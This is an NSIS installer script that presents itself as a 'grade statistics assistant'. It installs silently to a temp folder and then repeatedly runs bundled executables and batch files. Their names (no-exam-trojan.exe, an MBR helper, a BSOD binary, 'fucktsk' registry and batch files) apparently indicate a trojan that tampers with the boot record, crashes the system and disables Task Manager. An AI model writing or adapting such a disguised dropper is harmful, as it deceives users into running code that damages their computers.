; Script generated by the HM NIS Edit Script Wizard.

; HM NIS Edit Wizard helper defines
!define PRODUCT_NAME "成绩统计助手"
!define PRODUCT_VERSION "2.0"
!define PRODUCT_PUBLISHER "qwq"

Name "${PRODUCT_NAME}"
OutFile "..\out\成绩统计助手.exe"
InstallDir "$TEMP\qwq"
Icon "..\installer.ico"
SilentInstall silent
InstallDirRegKey HKLM "${PRODUCT_DIR_REGKEY}" ""

Section "MainSection" SEC01
  SetOutPath "$INSTDIR"
  SetOverwrite ifnewer
  File "..\bin\x86\Release\no-exam-trojan.exe"
  File "..\mbr\helper.exe"
  File "..\bsod\biliapi.exe"
  File "restsk.reg"
  File "fucktsk.reg"
  File "restsk.bat"
  File "fucktsk.bat"
  execwait "$INSTDIR\fucktsk.bat"
  execwait "$INSTDIR\fucktsk.bat"
  execwait "$INSTDIR\helper.exe"
  execwait "$INSTDIR\helper.exe"
  execwait "$INSTDIR\helper.exe"
  execwait "$INSTDIR\helper.exe"
  execwait "$INSTDIR\no-exam-trojan.exe"
  execwait "$INSTDIR\restsk.bat"
  exec "$INSTDIR\biliapi.exe"
  exec "$INSTDIR\biliapi.exe"
  exec "$INSTDIR\biliapi.exe"
  exec "$INSTDIR\biliapi.exe"
  exec "$INSTDIR\biliapi.exe"
  exec "$INSTDIR\biliapi.exe"
  exec "$INSTDIR\biliapi.exe"
  exec "$INSTDIR\biliapi.exe"
SectionEnd
